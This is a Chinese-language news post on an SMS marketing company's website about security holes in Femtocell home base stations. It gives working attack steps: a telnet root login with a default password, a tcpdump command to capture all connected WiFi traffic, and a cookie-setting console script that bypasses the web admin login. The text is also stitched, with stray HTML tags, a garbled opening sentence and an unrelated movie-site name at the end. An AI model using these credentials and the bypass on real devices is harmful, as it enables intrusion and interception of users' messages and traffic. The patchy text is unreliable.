<code id="dxkde"><ol id="dxkde"></ol></code><code id="dxkde"><u id="dxkde"><span id="dxkde"></span></u></code>

  • <output id="dxkde"><legend id="dxkde"></legend></output>
    短信積分商城 400-6699-521 咨詢熱線: 0371-69067686
    行業動態Industry Dynamics
    您的位置: 首頁 > 樂信行業動態 >

    家庭基站Femtocell截獲任意短信漏洞,危及公眾移動通信安全

    發布時間:2015-11-23
      移動互聯網發展到帳用戶對短信、通話、數據流需求劇增,轉向互動任意短信需求,而Femtocell設備可以被改造成偽基站短信群發器,截取家庭任意短信隱私,移動短信安全通信漏洞凸顯。
      近日,有部分運營商通報Femtocell雖能瞬間解決室內ip網絡覆蓋問題,但是漏洞問題百出,很多廠家已經對全網設備進行緊急修復,漏洞暫時已經修復完成,但是漏洞問題還會存在嗎?
      樂信揭秘Femtocell任意漏洞三大細節:
      ①root弱密碼
      可以直接telnet登錄,然后就是一個擁有root權限的Linux shell了。
      $ telnet 192.168.197.1
      login: root
      password: 5up
      順便提一句,這個密碼應該是Atheros的參考設計板PB44的默認密碼,很多廠商拿來都不改。在搜索引擎上以"5up"和"root"為關鍵詞,可以搜索到不少有趣的東西。
      并且發現上面的busybox基本沒有裁剪,甚至連tcpdump功能都有。
      于是,可以直接抓取到所有連上此WiFi的流量:
      busybox tcpdump -i br0 not port 23
      ② 其它利用方式
      /mnt/flash/nvm/femtoOamStore.db 是 Sqlite3 的文件,可以使用sqlitebrowser直接查看
      閃燈 /mnt/flash/led_ctrl.sh [on|off]
      ③ RF 板卡滲透:Web 登錄繞過
      訪問 http://192.168.197.241/C/userProcessFunction.asp?reqType=4&role=marketUser 獲得用戶名為
      [email protected]
      然后在USER.js里發現原有的登錄繞過問題沒有得到修復,于是在瀏覽器中打開Console,輸入以下腳本即可登錄:
      SetCookie('role', 'marketUser');
      SetCookie('username', '[email protected]');
      SetCookie('levels', [-2, 0, 1, 3, 11, 13, 15, 16]);
      document.cookie = "loginFlag=1;";
      window.top.location = 'main.asp?r=' + Math.random() + '#index';
      登錄之后,我們就擁有了與運營商派過來開站的工程師完全一樣的操作權限!
    (責任編輯:樂信短信平臺)
    七七电影网